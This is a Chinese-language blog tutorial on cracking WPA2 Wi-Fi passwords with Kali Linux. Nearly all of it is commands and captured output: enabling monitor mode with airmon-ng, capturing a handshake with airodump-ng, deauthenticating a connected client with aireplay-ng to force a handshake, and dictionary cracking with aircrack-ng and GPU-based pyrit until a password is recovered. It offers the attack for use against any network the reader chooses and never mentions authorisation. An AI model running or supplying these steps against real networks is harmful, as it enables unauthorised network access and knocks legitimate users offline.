kali无线破解实战示例

发表于: 分类于:
字数: 615 阅读:≈ 2分钟 浏览:

首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡

root@kali:~# iwconfig 
wlan1     IEEE 802.11bg  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

lo        no wireless extensions.

查看无线网卡设备名

root@kali:~# airmon-ng start wlan1


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID     Name
2772    dhclient
4415    wpa_supplicant


Interface       Chipset         Driver

wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络

从中找到你要测试破解的,copy下来BSSID

root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0

 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                   
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                   
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                   
 E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
 E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

当看到WPA handshake:说明抓到了握手包,就可以来破解了

如果一直抓不到,可以用如下命令来攻击,强迫重新握手

aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one

抓到握手包后,就可以用字典来跑密码了。

root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
Opening nenew-21.cap
Read 18654 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)

Choosing first network as target.

Opening nenew-21.cap
Reading packets, please wait...

跑的速度如何取决于你机器的性能,更取决于你的字典

如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多

kali linux下装显卡驱动,sdk等,参考如下链接

http://xiao106347.blog.163.com/blog/static/2159920782013113013549364

http://vistb.net/2011/08/how-to-crack-wifi-part-four/

http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡,很快就跑出了密码

root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'nenew-21.cap' (1/1)...
Parsed 14 packets (14 802.11-packets), got 1 AP(s)

Tried 4420221 PMKs so far; 86496 PMKs per second.

The password is 'qq123789'.

参考链接:http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html